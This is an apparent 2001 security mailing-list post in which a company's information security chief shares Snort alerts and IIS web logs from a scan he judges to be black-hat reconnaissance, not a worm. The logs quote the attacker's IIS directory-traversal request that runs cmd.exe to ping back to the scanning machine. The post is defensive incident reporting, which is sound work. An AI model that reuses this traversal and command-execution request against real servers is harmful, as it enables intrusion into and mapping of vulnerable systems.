Sneaky vuln-scanning, vulnerable list generation

["Keith.Morgan" <Keith.Morgan () Terradon com>]

I don't think this is a worm.   I think this is most probably a black-hat
scanning technique.

Note the command the scanner attempted to execute.  A single ping-back to
the scanning machine.  This would allow the scanner to easily generate a
list of vulnerable boxen.

Attached are intrusion detection system and webserver logs in EST.

Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt:
24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt:
24.41.72.83:2828 -> Pub.IP.Address:80
Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt:
24.41.72.83:2927 -> Pub.IP.Address:80
Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt:
24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt:
24.41.72.83:2924 -> Pub.IP.Address:80
Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt:
24.41.72.83:2924 -> Pub.IP.Address:80

2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET
/scripts/..%5c..%5cwi
nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET
/scripts/..%5c..%5cwi
nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -


Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morgan () terradon com
304-755-8291 x142


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com